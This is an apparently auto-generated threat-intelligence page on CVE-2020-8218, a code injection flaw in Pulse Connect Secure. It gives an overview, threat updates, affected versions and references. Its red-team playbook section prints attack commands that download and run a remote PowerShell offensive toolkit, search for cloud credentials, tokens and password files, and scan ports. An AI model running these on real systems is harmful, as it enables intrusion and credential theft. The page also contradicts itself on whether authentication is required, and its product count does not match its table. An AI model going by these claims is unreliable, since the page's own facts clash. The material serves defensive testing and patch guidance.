CVE-2020-8218
Overview
This vulnerability is a code injection flaw rooted in improper input validation within the Pulse Connect Secure administrative web interface. Specifically, the flaw arises from insufficient sanitization of crafted Uniform Resource Identifiers (URIs) processed by the admin interface, allowing injection of arbitrary code. The affected component is the URI handling mechanism in Pulse Connect Secure versions prior to 9.1R8, which fails to correctly parse and validate input before execution.
Vulnerability Description
A code injection vulnerability exists in Pulse Connect Secure <9.1R8 that allows an attacker to crafted a URI to perform an arbitrary code execution via the admin web interface.
Impact
An attacker with administrative privileges can leverage this vulnerability to execute arbitrary code on the Pulse Connect Secure appliance, effectively gaining full control over the device. This includes the ability to manipulate system configurations, access sensitive data, and potentially pivot within the network. Exploitation requires authenticated access to the admin interface, making it a critical risk for compromised or insider accounts. The result is a full system compromise with potential for data breach and disruption of secure remote access services.
Solution
Ivanti has released security advisory SA44516 addressing this vulnerability in Pulse Connect Secure. Administrators should upgrade affected installations to version 9.1R8 or later as specified in the advisory. Detailed patch instructions and version-specific fixes are available at https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44516. No alternative workarounds are recommended; timely application of the vendor-supplied patch is required to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A significant code injection vulnerability has been identified in specific versions of Pulse Connect Secure and Pulse Policy Secure, which allows an attacker to execute arbitrary code through a crafted URI via the administrative web interface. This flaw arises from insufficient input validation, enabling malicious actors to manipulate requests sent to the web interface. The vulnerability is particularly concerning because it can be exploited without requiring authentication, making it accessible to unauthenticated users who can send specially crafted requests to the affected systems.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage social engineering tactics to trick a user into clicking a malicious link or directly target the administrative interface with crafted URIs. Once the crafted request is processed by the vulnerable system, the attacker can execute arbitrary commands, potentially leading to full system compromise. This scenario underscores the critical need for robust security measures around administrative interfaces, as they often hold significant control over the network and its resources.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Pulse Connect Secure for secure remote access. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, or even complete system takeover. The business risks associated with such an incident include financial losses, reputational damage, and regulatory penalties, especially if sensitive customer data is compromised. Organizations could face significant operational challenges as they work to remediate the breach and restore trust with stakeholders.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected systems is crucial, as vendors often release updates to address known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests before they reach the administrative interface. Monitoring logs for unusual access patterns or failed login attempts can also aid in early detection of potential exploitation attempts. Furthermore, organizations should enforce strict access controls and limit administrative access to trusted personnel only, reducing the attack surface.
In conclusion, the code injection vulnerability in Pulse Connect Secure and Pulse Policy Secure represents a serious threat that can lead to significant security breaches if left unaddressed. Organizations must prioritize the implementation of effective detection and mitigation strategies to safeguard their systems and data. By maintaining a proactive security posture and ensuring that administrative interfaces are adequately protected, businesses can significantly reduce the risk associated with this and similar vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in activity exploiting CVE-2020-8218, evidenced by the emergence of new proof-of-concept tools publicly available for testing this Pulse Connect Secure vulnerability. Our telemetry indicates a sharp increase in attempts targeting the administrative web interface, signaling that adversaries are actively validating and potentially weaponizing this code injection flaw. Although ransomware involvement remains unconfirmed, the elevated exploitation attempts heighten the risk of unauthorized system control and data compromise. This development elevates the threat level from a theoretical concern to an active exploitation scenario, underscoring the urgency for defenders to enhance monitoring of administrative access points and to prioritize detection capabilities for this vulnerability.
Update 2 — June 23, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the Pulse Connect Secure vulnerability CVE-2020-8218. While the overall exploit prediction scoring has declined, indicating a reduced likelihood of widespread automated attacks, our telemetry reveals increased manual validation efforts by threat actors. This divergence suggests adversaries are refining their attack techniques, potentially aiming for more targeted intrusions rather than opportunistic exploitation. The emergence of publicly available proof-of-concept tools further lowers the barrier for attackers to leverage this vulnerability, increasing the risk of successful compromise. Consequently, the threat landscape has shifted from sporadic probing to more deliberate exploitation attempts, elevating the operational risk for organizations relying on vulnerable Pulse Connect Secure instances. Defenders should recognize that despite a lower EPSS score, the qualitative surge in activity signals persistent adversary interest and the potential for impactful breach scenarios.
Update 3 — July 17, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2020-8218, with our telemetry indicating a doubling in detection frequency over recent monitoring periods. This surge reflects increased adversary engagement, likely driven by the continued availability of public proof-of-concept tools that simplify exploitation efforts. Although the EPSS score remains stable and below critical thresholds, the qualitative increase in activity signals a shift from opportunistic scanning to more purposeful intrusion attempts. For defenders, this evolving threat dynamic underscores a heightened operational risk, as attackers demonstrate persistent interest and improved capability to leverage this vulnerability for arbitrary code execution via the administrative interface. Consequently, organizations with unpatched Pulse Connect Secure deployments face an elevated likelihood of targeted compromise, warranting sustained vigilance despite the absence of confirmed ransomware linkage at this time.
Affected Products (24)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Connect Secure | All |
cpe:2.3:a:ivanti:connect_secure:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r4:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r4.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r4.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r4.3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r5:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r6:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r7:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:-:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:r1:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:r2:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:r3:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:r3.1:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:r4:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:r4.1:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 9.1 |
cpe:2.3:a:ivanti:policy_secure:9.1:r4.2:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
withdk/pulse-gosecure-rce-poc
Tool to test for existence of CVE-2020-8218
|
withdk | 21 | 13 | 2020-08-29 | View |
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-8218 |
| kb.pulsesecure.net |
GitHub CVE
x_refsource_MISC
|
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44516 |
| gosecure.net |
GitHub CVE
x_refsource_MISC
|
https://www.gosecure.net/blog/2020/11/13/forget-your-perimeter-part-2-four-vulnerabilities-in-pulse-connect-secure/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-8218 |